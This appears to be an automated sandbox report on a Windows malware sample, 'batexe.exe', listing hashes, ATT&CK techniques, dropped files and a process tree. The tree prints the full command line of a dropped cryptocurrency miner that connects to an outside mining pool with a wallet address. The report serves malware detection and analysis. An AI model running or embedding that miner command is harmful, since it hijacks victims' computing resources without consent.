73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
296s
max time network
301s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
12/02/2024, 04:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\International\Geo\Nation	b2e.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\International\Geo\Nation	batexe.exe

Executes dropped EXE 2 IoCs

pid	Process
4692	b2e.exe
4720	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4720	cpuminer-sse2.exe
4720	cpuminer-sse2.exe
4720	cpuminer-sse2.exe
4720	cpuminer-sse2.exe
4720	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/876-8-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 876 wrote to memory of 4692	876	batexe.exe	86
PID 876 wrote to memory of 4692	876	batexe.exe	86
PID 876 wrote to memory of 4692	876	batexe.exe	86
PID 4692 wrote to memory of 2976	4692	b2e.exe	87
PID 4692 wrote to memory of 2976	4692	b2e.exe	87
PID 4692 wrote to memory of 2976	4692	b2e.exe	87
PID 2976 wrote to memory of 4720	2976	cmd.exe	90
PID 2976 wrote to memory of 4720	2976	cmd.exe	90

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:876
- C:\Users\Admin\AppData\Local\Temp\978D.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\978D.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\978D.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4692
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9F4D.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2976
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4720

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\978D.tmp\b2e.exe

Filesize
9.9MB

MD5
3d66c35d1b5f791991949390e10de68c

SHA1
bc053d2bbb14a62cd439db5d1d41dff56c3b3b63

SHA256
53911eeef4713ed88a4b34e805b5c988ebaca54c57781c08b49b7c671a22beee

SHA512
82a247f6956953ec7b128af8aa4d3feb6560d9617810477ddd35674e4d3911f5bd1a8b64a271eeaf3d6e98fe54561915a63edb35c0169aa67670d859bb01a0c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\978D.tmp\b2e.exe

Filesize
128KB

MD5
272c54a9b6cdfa558e23cc257343048a

SHA1
7f26d86cf2a3625ce3e70c9cfc9b0cc075b8d5aa

SHA256
1d7e7ea2934d091cb7ab81c31e31b4015e05a9f86b213f9d78b0297c88fb3415

SHA512
5139de29262ba7091e5ab0529232912aea9ca34fdeb16165021d3ccaba1d351abc59f2130eaa6af8c3c0510db5f649095f7043ea837267dc9eb4ce0169fa18ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\978D.tmp\b2e.exe

Filesize
64KB

MD5
3e63d8d147aec3c4d5e3e08d79395350

SHA1
633cc399218c2915b895a83bda89bce9f37e39dc

SHA256
39cc053a2dc8074a4530b02f00bd8bb723e52196224d978d9aad3b0f75740320

SHA512
545308057e5ea490e55f5bdd7fbec20fd954f847cae6f60460a4b135bf76c4c8502d922768d8e3a96d29d4c3a513b91ebc40bcaf5395de2c50d4368fd46fc536

Download Submit
C:\Users\Admin\AppData\Local\Temp\9F4D.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
2.3MB

MD5
4c04147c386ba8792ac6a03069572a8a

SHA1
dda67789fc1d0f2469ca95f01a5c81034853ca6a

SHA256
c7739a1e940a282703d06eccda7110426d306f390e97fdbbd9df18472fd132cd

SHA512
a8b5a0b878a9a7d30cb38feff814e1f4dce24d000158edc10a43ee9a89920bedf7adc92eb7e3913098b6aab7fbd0531f56fc09f508b5c2769992a94e55d153db

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
2.0MB

MD5
a27e1b79da15d29e3fa4f52b1c73f266

SHA1
ff09d45d4ad52007ab7c9b8b4428bff1f27c2632

SHA256
876e35c8d0ef68b4169b4c610a1424a1593030e86929b7c8622a1f6bd226910e

SHA512
95d250c1c6bf64f0df7e6143d16341a2a6df1051d319c946422571fca10e8d1fc0f3771c75864eede38f4cbf78ec3142888930e207484d11fd6236162b36d617

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
128KB

MD5
0cfc533c46d2f160fc8d8483706228cf

SHA1
0d13ced09eeed5fc3879f418bda0410a742ab6a1

SHA256
510a6af4547083718b32dc00d4711cfff2aec0e7b936d4199feaaf32a7d5d3a6

SHA512
11e35867688e7814881981298b6f6948fceaf254d154f5429e5a82c43397b1894bd35fe7fb586b26e4272d8371c3b8e96c20c71ab05b9df3e851291444702a79

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
7cf672bee2afba2dcd0c031ff985958e

SHA1
6b82a205db080ffdcb4a4470fce85a14413f3217

SHA256
c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

SHA512
3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
65KB

MD5
a0acc4cb6ae4328efbcb698b230b293c

SHA1
40cf6aa55624d471694b6c33f7a222920627022e

SHA256
454b6cc122eaecd93905908a88313b3258e19c06629b82273c751d409f713f75

SHA512
08649678c0ea7fd813db17151be61ada91bd30ba9f7ba1b2ba2c55f0dba920c637c9f5663ff95d764edd900298d9837126a582719403bc9076d45dc02c35e380

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
2.4MB

MD5
64c950bf8fdfd736cb6628b80cdc39dc

SHA1
d58af2b756a1933ba75dbf80f9baa8c19924e962

SHA256
8d6adb2a194c4431e3620a554b6aab65d642641b1db3b61fab63b7920eeddc2f

SHA512
7850835811333f6ed8e08ec10350f9d651239db4d1ba5948e0f1f833bb19451fe49fb5a1665d744bda6719f031a17b3580ec2c602d16cc17428e983958bb5768

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
14KB

MD5
5c37dcf3e37dbc99177c5bcf977be61c

SHA1
44b8d5a15e30792b04ebbcd38b18779b66b5c07e

SHA256
29d05cc85bfba5e047fa07d67fd4832259ed2cd8e651e1d0719d6d1fe4ab1c5c

SHA512
7653829956b1e040b59d78d1b8d3efae81a65c906be1a5538d0ec6167af3fce5f0cfeaa506290d3ab23d192ff971a408c5b4a74736c83ba3ee9e6faa6b611d7d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1KB

MD5
7afca165eb598c56e10ab965bb8846ac

SHA1
ec4f2164d7fd2e3a9ef14f6de528a322173a9453

SHA256
555ac9bea13abc8011c591542b66c78024aa8f18c80f5a0114d5200a8b17730f

SHA512
d747e3aae86c96e7821538575d6d5a810125f584f80d4404b3dae3aea0afae5ddfd3b353b6cc7cc4bf40e30c1c2b2f88eacce19cab10e142ff9998a910f179cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
44KB

MD5
02f2ec72d4e847068a41d7a9b53abaf6

SHA1
60f67e900496610989864eed79c8c412a0bd0c4f

SHA256
f99b71c61aa1402f5a3c0a28d8d6571ddc68cc2a2b1445152ae4441b12f0f231

SHA512
11b70014122482004cf8c1ba8a96f613a5b9ad05704b1592a64072a45213c420c8c63838c429a9c99274ce745b21f2d7d93a420c1d5f271250570a2bda0f32e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
15KB

MD5
33813362453bdfcb74cb3e91ca3127c1

SHA1
7a3f19472fffb29fdd222e4fb5f8ba2f775f6710

SHA256
d417e1da77cc09323c7cdc3535c7eab1aa4f5c51855ce1b18a486516aff70e70

SHA512
fc7a6a17288bd88957280f751977adccfa26ec74c274e8f38d04b74e3d4f7a6e5204a37f12414f200c9c35dde0ed2b0bf93627cbf2a9b63a620b600b47eac199

Download Submit
memory/876-8-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/4692-9-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4692-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4720-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4720-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4720-46-0x0000000073670000-0x0000000073708000-memory.dmp

Filesize
608KB

Download
memory/4720-47-0x0000000001160000-0x0000000002A15000-memory.dmp

Filesize
24.7MB

Download
memory/4720-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4720-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4720-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4720-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4720-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4720-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4720-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4720-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4720-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4720-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download